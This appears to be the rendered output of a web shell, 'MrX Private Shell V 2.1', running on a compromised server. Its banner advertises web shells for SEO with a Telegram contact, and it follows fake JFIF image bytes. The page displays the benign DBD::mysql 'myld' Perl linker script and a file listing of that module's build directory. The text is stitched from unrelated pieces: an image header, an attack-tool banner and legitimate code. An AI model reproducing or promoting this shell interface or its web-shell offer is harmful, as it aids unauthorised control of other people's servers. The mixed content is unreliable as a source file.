����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# -*- cperl -*-
#
# Small frontend for ld that ought to catch common problems
# in the linking stage
#
use strict;
use Data::Dumper;
# fix to get link on Mac OSX to work!
if ($ARGV[0] =~ /MACOSX/)
{
my ($macenv, $macenvval) = split('=',$ARGV[0]);;
$ENV{$macenv} = $macenvval;
shift @ARGV;
}
open(OLDSTDERR, ">&STDERR") || die "Failed to backup STDERR: $!";
open(FILE, ">myld.stderr") || die "Failed to create myld.stderr: $!";
open(STDERR, ">&FILE") || die "Failed to redirect STDERR: $!";
my $retval = system(@ARGV);
open(STDERR, ">&OLDSTDERR");
close(FILE) || die "Failed to close myld.stderr: $!";
my $contents = "";
if (-f "myld.stderr" && !-z _) {
open(FILE, "<myld.stderr") || die "Failed to reopen myld.stderr: $!";
local $/ = undef;
$contents = <FILE>;
die "Failed to read myld.stderr: $!" unless defined($contents);
close(FILE) || die "Failed to close myld.stderr: $!";
if ($contents =~ /cannot find -l(g?z)/i) {
my $missing = $1;
print <<"MSG";
$contents
An error occurred while linking the DBD::mysql driver. The error
message seems to indicate that you don't have a lib$missing.a,
or a lib$missing.so. There are a few ways to resolve this:
1) You may try to remove the -lz or -lgz flag from the libs list
by using the --libs switch for "perl Makefile.PL".
2) On Red Hat Linux and SUSE Linux, install the zlib-devel package
(sometimes called libz-devel)
3) On Debian and Ubuntu, install the zlib1g-dev package
4) On other systems, please contact the mailing list
perl\@lists.mysql.com
For further hints, see DBD::mysql::INSTALL, section Linker flags.
MSG
exit 1;
}
}
if ($retval) {
print STDERR $contents;
exit 1;
}
END { unlink "myld.stderr"; }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| Changes | File | 89.22 KB | 0644 |
|
| LICENSE | File | 17.94 KB | 0644 |
|
| MANIFEST | File | 1.86 KB | 0644 |
|
| MANIFEST.SKIP | File | 210 B | 0644 |
|
| META.json | File | 4.6 KB | 0644 |
|
| META.yml | File | 3.47 KB | 0644 |
|
| MYMETA.json | File | 4.6 KB | 0644 |
|
| MYMETA.yml | File | 3.47 KB | 0644 |
|
| Makefile | File | 53.66 KB | 0644 |
|
| Makefile.PL | File | 21.27 KB | 0644 |
|
| README.md | File | 1.04 KB | 0644 |
|
| SECURITY.md | File | 4.38 KB | 0644 |
|
| constants.h | File | 1.9 KB | 0644 |
|
| dbdimp.c | File | 140.55 KB | 0644 |
|
| dbdimp.h | File | 8.84 KB | 0644 |
|
| myld | File | 1.68 KB | 0644 |
|
| mysql.bs | File | 0 B | 0644 |
|
| mysql.xs | File | 16.89 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| socket.c | File | 923 B | 0644 |
|